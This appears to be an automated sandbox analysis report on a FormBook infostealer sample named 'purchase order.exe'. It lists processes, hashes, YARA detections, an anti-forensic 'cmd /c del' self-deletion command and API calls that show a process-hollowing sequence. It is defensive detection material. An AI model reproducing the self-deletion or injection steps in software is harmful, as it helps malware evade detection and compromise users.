                                                    [Charts: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior]

                                                    System Behavior

                                                    General

                                                    Start time:08:34:50
                                                    Start date:26/11/2020
                                                    Path:C:\Users\user\Desktop\purchase order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\purchase order.exe'
                                                    Imagebase:0x8d0000
                                                    File size:908288 bytes
                                                    MD5 hash:975187A07455D3CBF38EC878D893B490
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:08:34:59
                                                    Start date:26/11/2020
                                                    Path:C:\Users\user\Desktop\purchase order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\purchase order.exe
                                                    Imagebase:0xbf0000
                                                    File size:908288 bytes
                                                    MD5 hash:975187A07455D3CBF38EC878D893B490
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:08:35:01
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff6f22f0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:35:15
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\SysWOW64\msdt.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                                    Imagebase:0xf60000
                                                    File size:1508352 bytes
                                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:08:35:19
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\purchase order.exe'
                                                    Imagebase:0x2a0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:08:35:19
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff61de10000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis


                                                      Executed Functions

                                                      APIs
                                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 06A2A67C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 2645101109-3232529671
                                                      • Opcode ID: 2c17564c75dec0ff8da15ecaf9895df78e8179b3a9d397fea9ea4da4cfdc7f2a
                                                      • Instruction ID: 4a42320a7a37a9a791354f529047182dfb1955bde02d5d2873e52b204b892472
                                                      • Opcode Fuzzy Hash: 2c17564c75dec0ff8da15ecaf9895df78e8179b3a9d397fea9ea4da4cfdc7f2a
                                                      • Instruction Fuzzy Hash: BD71DE74E042298FDB64DFA9C880BDEFBF1BB49304F108169E519AB350DB749885CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: FindWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 134000473-3232529671
                                                      • Opcode ID: 2c2368f8f88cde7b1ba6dca77af45c5f07f62969167d5678793e7b1ad400cb70
                                                      • Instruction ID: de86b840ca240c0ca455102a50085701c9214e251fb01768a064cc86fd7f3c50
                                                      • Opcode Fuzzy Hash: 2c2368f8f88cde7b1ba6dca77af45c5f07f62969167d5678793e7b1ad400cb70
                                                      • Instruction Fuzzy Hash: 87410EB4D003599FDB50DFA9D884B9EFBF1BB49314F20812AE814BB240D7749886CF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: FindWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 134000473-3232529671
                                                      • Opcode ID: 5803c5e2a56ffea4f299eb330d1a8b8e1e0d14a1e7c1b13c28ac943577a1e566
                                                      • Instruction ID: 887ac7f161a16797a30d71dd665e906215b097c13a786a554ea1cfe7720ccf4d
                                                      • Opcode Fuzzy Hash: 5803c5e2a56ffea4f299eb330d1a8b8e1e0d14a1e7c1b13c28ac943577a1e566
                                                      • Instruction Fuzzy Hash: AF41FEB0D003599FDB50DFA9D884B9EFBF1BB49314F20852AE914BB240D7749886CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 02B10C45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: A8y&
                                                      • API String ID: 1778838933-73667374
                                                      • Opcode ID: 6e44154f7f5cfdd36496f52575296f5f1615447eb1b3cf146981b1688dca7b03
                                                      • Instruction ID: 6dc4680ea9f880cca0c503086d3034a9da3ba92af2c7b81329173a97248ded24
                                                      • Opcode Fuzzy Hash: 6e44154f7f5cfdd36496f52575296f5f1615447eb1b3cf146981b1688dca7b03
                                                      • Instruction Fuzzy Hash: BB4166B9D042589FCF14CFA9D984ADEFBB1BB59310F10906AE818B7310D335A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 02B10C45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationProcessQuery
                                                      • String ID: A8y&
                                                      • API String ID: 1778838933-73667374
                                                      • Opcode ID: f82df142f8cf20730b4f5a3ac9ed8acbcc35a3f3b9ff67399535ffa48702eb7f
                                                      • Instruction ID: ff77138aea03be8d542bd5997f11c133561ade35ba7084cc1ff92acb862d241c
                                                      • Opcode Fuzzy Hash: f82df142f8cf20730b4f5a3ac9ed8acbcc35a3f3b9ff67399535ffa48702eb7f
                                                      • Instruction Fuzzy Hash: 1B4174B9E042589FCF10CFAAD984ADEFBB5BB59310F10906AE818B7310D335A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 91d18456dc9134864c42a0aec6d6a56de1ff852fc9d9dd4154751d889b67615d
                                                      • Instruction ID: 7967de3a31d66b2e2e1c66fccdca69077073081c10707dcd4e2b904c5af38c54
                                                      • Opcode Fuzzy Hash: 91d18456dc9134864c42a0aec6d6a56de1ff852fc9d9dd4154751d889b67615d
                                                      • Instruction Fuzzy Hash: 3D020670D50229CFDB60DFA9C885BDDBBB1BF48314F1085AAD809BB250EB709A85CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: e72b2bd4908a986e003d30760992bf67844136c6a9113d4d0ef6a76e751f51bd
                                                      • Instruction ID: 42b10bf5ef22e48085243490777b6a3e1f87838f77a066672ff22906354b6e68
                                                      • Opcode Fuzzy Hash: e72b2bd4908a986e003d30760992bf67844136c6a9113d4d0ef6a76e751f51bd
                                                      • Instruction Fuzzy Hash: 12F10370D01229CFDB64DFA9C981BDDBBF1BF49304F1095AAD809A7250EB349A85CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 0-3232529671
                                                      • Opcode ID: 27bea2a7134045878768f3c371d40eeecaf983a743bb4caea20c1c1b37e6a2da
                                                      • Instruction ID: d33496a909379f0efad9323dd1820513eb79db24ef9f110e27afe1644066d591
                                                      • Opcode Fuzzy Hash: 27bea2a7134045878768f3c371d40eeecaf983a743bb4caea20c1c1b37e6a2da
                                                      • Instruction Fuzzy Hash: 52F11874E002198FCB14DFA8C880AAEBBB1FF49314F15855AE519AB351DB34A946CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !$$
                                                      • API String ID: 0-187035826
                                                      • Opcode ID: 34d4ef535dc873fc41199fee7a9cca8de7e8cc9661988da19e5786a97ea52ef7
                                                      • Instruction ID: 563cd0c31ff103136a9cc1108865845d628ed91e4873f412fd0ede0e3e8ea291
                                                      • Opcode Fuzzy Hash: 34d4ef535dc873fc41199fee7a9cca8de7e8cc9661988da19e5786a97ea52ef7
                                                      • Instruction Fuzzy Hash: 4191D670D4522ACFDB64DF69C884BD9B7B2BF89304F1081EAD519A7240EB749AC5CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [
                                                      • API String ID: 0-3285150910
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \CV{
                                                      • API String ID: 0-4185198329
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \CV{
                                                      • API String ID: 0-4185198329
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hs0f
                                                      • API String ID: 0-4076217447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hs0f
                                                      • API String ID: 0-4076217447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02B185B0
                                                      • GetCurrentThread.KERNEL32 ref: 02B185ED
                                                      • GetCurrentProcess.KERNEL32 ref: 02B1862A
                                                      • GetCurrentThreadId.KERNEL32 ref: 02B18683
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID: A8y&
                                                      • API String ID: 2063062207-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 02B185B0
                                                      • GetCurrentThread.KERNEL32 ref: 02B185ED
                                                      • GetCurrentProcess.KERNEL32 ref: 02B1862A
                                                      • GetCurrentThreadId.KERNEL32 ref: 02B18683
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID: A8y&
                                                      • API String ID: 2063062207-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 063AEB3F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 963392458-3232529671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 06A2A67C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 2645101109-3232529671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1F999
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 716092398-3232529671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02B1F999
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 716092398-3232529671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(?), ref: 06A21C48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 1029625771-3232529671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(?), ref: 06A21C48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&$A8y&
                                                      • API String ID: 1029625771-3232529671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(?), ref: 02B1D82A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID: A8y&
                                                      • API String ID: 4139908857-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 063AE533
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID: A8y&
                                                      • API String ID: 3559483778-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B18843
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID: A8y&
                                                      • API String ID: 3793708945-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B18843
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID: A8y&
                                                      • API String ID: 3793708945-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 063AE69A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID: A8y&
                                                      • API String ID: 1726664587-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 063AE3BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: A8y&
                                                      • API String ID: 4275171209-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(?,?,?), ref: 02B1DB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&
                                                      • API String ID: 1029625771-73667374
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(?,?,?), ref: 02B1DB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: A8y&
                                                      • API String ID: 1029625771-73667374
                                                      • Opcode ID: dc818b0604ca539b4685d1e0138b9dae4449f992eefefdfc50389c9f83f2452a
                                                      • Instruction ID: d6ad0e5de14a5bffb300e4bc8ac86b40e382415601a5ac985042eafeea9329a6
                                                      • Opcode Fuzzy Hash: dc818b0604ca539b4685d1e0138b9dae4449f992eefefdfc50389c9f83f2452a
                                                      • Instruction Fuzzy Hash: 434196B9D012599FCB10CFA9D984A9EFBF0BB09314F14906AE818B7210D334A946CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetThreadContext.KERNELBASE(?,?), ref: 063AE1D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359211766.00000000063A0000.00000040.00000001.sdmp, Offset: 063A0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID: A8y&
                                                      • API String ID: 1591575202-73667374
                                                      • Opcode ID: 624784bfbdbcb0ad95891aca34ecdef884edfcd68f65e62a27b01f828eec44c8
                                                      • Instruction ID: efd8a4fe8eb40502c26eb9584e6c94be750513655040f5e3a72a7765dad58528
                                                      • Opcode Fuzzy Hash: 624784bfbdbcb0ad95891aca34ecdef884edfcd68f65e62a27b01f828eec44c8
                                                      • Instruction Fuzzy Hash: 2F31DBB4D012589FDB14DFAAD884AEEFBF0BF48314F14802AE414B7200D738A949DFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,00000000), ref: 06A2C2E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID: A8y&
                                                      • API String ID: 410705778-73667374
                                                      • Opcode ID: 6f5fbd6b16751d8f9be1dfbfba01863648a399ce8e5228a7e857e038df03939b
                                                      • Instruction ID: 681e791889bb9560e7f4f00644ab96f7599a8c1ed44be0958bc814dae59a5f5e
                                                      • Opcode Fuzzy Hash: 6f5fbd6b16751d8f9be1dfbfba01863648a399ce8e5228a7e857e038df03939b
                                                      • Instruction Fuzzy Hash: 003188B9D012589FCB10CFA9D984ADEFBF4BB49320F14906AE815BB310D735A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,?,?,00000000), ref: 06A2C2E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.359362072.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID: A8y&
                                                      • API String ID: 410705778-73667374
                                                      • Opcode ID: 64f13869321b3b8cdeda0ef8010e9ed58757c57849ca2f11c8fb3c1cf1e7c970
                                                      • Instruction ID: b7c25144e2f977050fb84c551cf5c3194c26a4dd49ac47eefe8121cc85c09a2b
                                                      • Opcode Fuzzy Hash: 64f13869321b3b8cdeda0ef8010e9ed58757c57849ca2f11c8fb3c1cf1e7c970
                                                      • Instruction Fuzzy Hash: A3318AB8D052589FCB50DFA9D484ADEFBF4BB09320F14905AE815B7310D774A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OutputDebugStringW.KERNELBASE(?), ref: 02B116A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DebugOutputString
                                                      • String ID: A8y&
                                                      • API String ID: 1166629820-73667374
                                                      • Opcode ID: 9ea30c99aaddae324b6221d2a44bf717433342afab786afa3b7a3c458ef264ad
                                                      • Instruction ID: 6b2a336208b0ecff62b6113817d4a8e9692dea68a6526853bb2ff1396c782707
                                                      • Opcode Fuzzy Hash: 9ea30c99aaddae324b6221d2a44bf717433342afab786afa3b7a3c458ef264ad
                                                      • Instruction Fuzzy Hash: 3A318AB4D012589FCB14CFA9D584ADEFBF1AF49314F14806AE818B7220D735A945CF65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OutputDebugStringW.KERNELBASE(?), ref: 02B116A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: DebugOutputString
                                                      • String ID: A8y&
                                                      • API String ID: 1166629820-73667374
                                                      • Opcode ID: d6fb09229ef7972a9971ca7215ef28b75c2f8e251900be0ebdfc0db987369f95
                                                      • Instruction ID: ad92f18e77a755c4af95dde1e54f7eaec86d3b724eff0484513db37549ef27a9
                                                      • Opcode Fuzzy Hash: d6fb09229ef7972a9971ca7215ef28b75c2f8e251900be0ebdfc0db987369f95
                                                      • Instruction Fuzzy Hash: C531B9B4D012089FCB14CFAAD984ADEFBF5AF49314F18806AE818B7320D734A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(?), ref: 02B1D82A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.355077235.0000000002B10000.00000040.00000001.sdmp, Offset: 02B10000, based on PE: false
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID: A8y&
                                                      • API String ID: 4139908857-73667374
                                                      • Opcode ID: ec7dd6e84de2c3787983cfe20b1e345d9621a0360114d7790831b223e9f12544
                                                      • Instruction ID: 32f5587ca873f9b59619d04d7c403db67af729a5ed265406d55f42ca42c8e601
